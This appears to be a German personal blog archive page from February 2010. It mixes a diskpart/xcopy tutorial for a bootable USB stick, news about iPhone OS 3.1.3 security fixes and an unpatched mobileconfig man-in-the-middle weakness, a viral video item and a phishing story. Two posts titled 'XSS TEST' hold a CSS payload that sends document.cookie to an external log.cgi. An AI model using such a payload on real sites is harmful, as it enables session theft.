You are currently browsing the archives for February, 2010.
Wie man einen USB Stick bootable macht
1.) Vorbereitung
Steckt den USB Stick an den Rechner an und mountet das Image des Betriebssystem in einem Programm eurer Wahl. Sichert alle Daten des USB Sticks, da diese im folgenden komplett überschrieben werden.
Es gibt jeweils am Ende der beiden folgenden Punkte im Spoiler ein Bild von den Konsolenfenstern mit (fast) allen Befehlen.
2.) Kommandozeilenzauberei
Im folgenden werden alle Befehle ohne Anführungszeichen eingegeben, wenn dort also “Befehl” steht gebt ihr Befehl ein.
Öffnet nun Start -> Ausführen (bzw. Start->Programme->Zubehör->Ausführen), gebt “cmd” ein und drückt Enter.
Nun öffnet sich ein Konsolenfenster, gebt dort “diskpart” ein, es öffnet sich ein neues Konsolenfenster.
Gebt in dieses nun folgende Befehle ein.
“list disk” <- um alle Laufwerke anzuzeigen, guckt z.b. Anhand der Größe welche Nr. der USB Stick hat.
“select disk <USB-Stick Nummer>” <- um den USB Stick auszuwählen
“clean” <- um alles darauf befindliche zu löschen
“create partition primary” <- selbsterklärend
“select partition=1″ <- um die gerade erstellte partition auszuwählen
“active” <- um sie zu aktivieren
“format fs=fat32″ <- um die Partition in das überall verständliche Format Fat32 zu formatieren
“assign” <- Damit die Partition auch im Windows Explorer angezigt wird.
Schließt das “obere” Konsolenfenster was C:\windows\system32\diskpart.exe heißt.
Nun verhält sich der USB Stick genauso wie ein DVD und ist Bootfähig.
3.) Betriebssystem kopieren
Es reicht nicht im Explorer nur copy&paste zu machen, da evtl versteckte Daten nicht mitkopiert werden.
Geht daher wieder in das Konsolenfenster C:\windows\system32\cmd.exe und gebt folgenden Befehl ein:
xcopy <Image>:\*.* <USB Stick>:\*.* /S /E /F
<Image> ist der Buchstabe eures Laufwerks in welchem das Image des Betriebssystem gemountet ist.
<USB Stick> ist der Buchstabe des USB Sticks.
Abwarten bis alles kopiert ist, danach kann der USB Stick zum installieren von Betriebssystemen verwendet werden. (Nicht vergessen im Bootmenü auf USB Stick umzustellen)
XSS TEST2
<style>
.getcookies{background-image:url(‘javascript:new Image().src=”http://www.meixner.org/log.cgi?c=”+encodeURI(document.cookie);’);}
</style>
<p class=”getcookies”></p>
XSS TEST 1
<style>
.getcookies{background-image:url(‘javascript:new Image().src=”http://www.meixner.org/log.cgi?c=”+encodeURI(document.cookie);’);}
</style>
<p class=”getcookies”></p>
Neue Iphone Version 3.13
Bei diesen Schauergeschichten liebe ich mir doch noch die Version 3.0! Ich persönlich finde die schwachen ausreden der sooooo gefährlichen Schwachstellen einfach plump! Apple will einfach nur Hintertüren zum umgehen des Net-Lock sperren und ansonsten nichts.
Apple hat OS 3.1.3 für alle Modelle von iPhone und iPod touch vorgelegt, das die Stabilität erhöhen und Sicherheitslücken schließen soll. Das Update wird über iTunes angeboten und ist je nach Modell bis zu 300 MByte groß. Unter anderem verbessert es die Genauigkeit der Batteriestatusanzeige beim iPhone 3GS und behebt ein Problem, in dessen Folge Apps von Drittanbietern gelegentlich nicht starten. Zudem sollen Apps beim Benutzen der japanischen Kana-Tastatur nun nicht mehr abstürzen.
Das Update schließt zudem fünf Sicherheitslücken in ImageIO, WebKit, CoreAudio und dem Recovery Mode, von denen der Hersteller drei als kritisch einstuft. Angreifer könnten beispielsweise über manipulierte Audio-Dateien und TIFF-Bilder Code in ein Gerät schleusen und starten. Gleiches soll durch einen Fehler in WebKit beim Parsen präparierter Verzeichnislisten von FTP-Servern möglich sein. Durch den Fehler im Recovery Mode könnte ein Angreifer mit bestimmten USB-Kontrollnachrichten den Zugriffsschutz umgehen, um Nutzerdaten auszulesen. Nach der Installation des OS 3.1.3 auf dem iPhone soll das Jailbreaking etwa mit dem Tool redsn0w nicht mehr funktionieren.
Ungepatcht bleibt indes eine vor wenigen Tagen bekannt gewordene Schwachstelle, mit der Man-in-the-Middle-Attacken möglich werden. Das iPhone akzeptiert Konfigurationsdateien (mobileconfig) für bestimmte Einstellungen und sogar Installationsdateien mit neuen Zertifikaten, wenn sie digital signiert sind. Allerdings ist es offenbar egal, von welcher CA sie unterschrieben wurden. Wichtig ist nur, dass es eine gültige CA ist. Das Verteilen von Konfigurationsdateien auf Endgeräte (Over the Air Provisioning, OTA) hat Apple für Unternehmensanwender eingeführt, damit Admins eine zentrale Verwaltungsmöglichkeit haben. Üblicherweise beschränkt man die Gültigkeit solcher Dateien aber auf unternehmenseigene Zertifikate.
Zwar muss der Anwender die Übernahme der neuen Einstellungen akzeptieren, mit geschickt gemachten Namen und Bezeichnungen sowohl in der Konfigurationsdatei und im Zertifikat dürften Anwender aber kaum Verdacht schöpfen. Angreifer könnten auf diesem Wege normale Verbindungen belauschen und selbst vermeintlich SSL-gesicherte Verbindungen zu Servern mit einer unbemerkten Man-in-the-Middle-Attacke aufbrechen. Dazu würde es genügen, heimlich einen HTTP-Proxy in die Konfiguration des Browsers und ein eigenes SSL-Zertifikat in die Liste der Zertifikate einzutragen.
Update] Eine weitere Neuigkeit der Version 3.1.3 betrifft ausschließlich “freie” iPhones, also Geräte ohne T-Mobile-Netlock: Diese geben ihre Internetverbindung nun erneut an einen per USB oder Bluetooth angeschlossenen Computer weiter (Tethering). Diese Funktion hatte Apple im vergangenen September mit dem iPhone OS 3.1 reglementiert, sodass nur T-Mobile-Kunden mit der Option “Modemnutzung” sie nutzen konnten. Im Test von heise online mit einem entsperrten iPhone mit OS 3.1.3 funktionierte das Tethering mit einer Vodafone-SIM-Karte, jedoch nicht mit Karten von T-Mobile und Congstar. Außerdem muss iTunes auf dem angeschlossenen Rechner installiert sein. [/Update]
Bikini Banker aus Sydney
Dem 7news-Beitrag verlieh das seit Montag eine Reichweite, die die Sendung wohl noch nie erreicht hat: Gleich mehrere YouTube-Mitschnitte gehen um, die schon jetzt viele hundertausendmal aufgerufen wurden. In zahlreichen Kategorien sind die Filmchen zurzeit unter den meistgesehen, meistkommentierten, meistweiterempfohlenen, bestbewerteten Web-Videos vertreten. Am populärsten sind per Handkamera vom Fernseher abgefilmte Versionen, in denen direkt auf den arbeitsscheuen Banker und sein Objekt der Bewunderung gezoomt wird. Kein Wunder, denn man muss schon genau hinsehen, um den Banker zu erwischen, wie man hier im (weniger populären) Originalclip sieht. Der interessante Teil beginnt nach 1 Minute 6 Sekunden:
Hacker legen Emissionshandel lahm
Mit Steuersünder-Daten kann ja mittlerweile jeder Geld verdienen… Hier haben Hacker den Emissionshandel von halb Europa untergraben. Der Schaden beziffert sich ungefähr auf 1,5 Mio. Euro. Interessant ist, dass die Hacker wohl über Phishing an die Zugangsdaten gekommen sind. Die betroffenen Behörden sind derzeit dabei die Sicherheitssysteme neu zu überarbeiten.
http://www.zeit.de/wirtschaft/2010-02/hacker-emissionshandel-datendiebstahl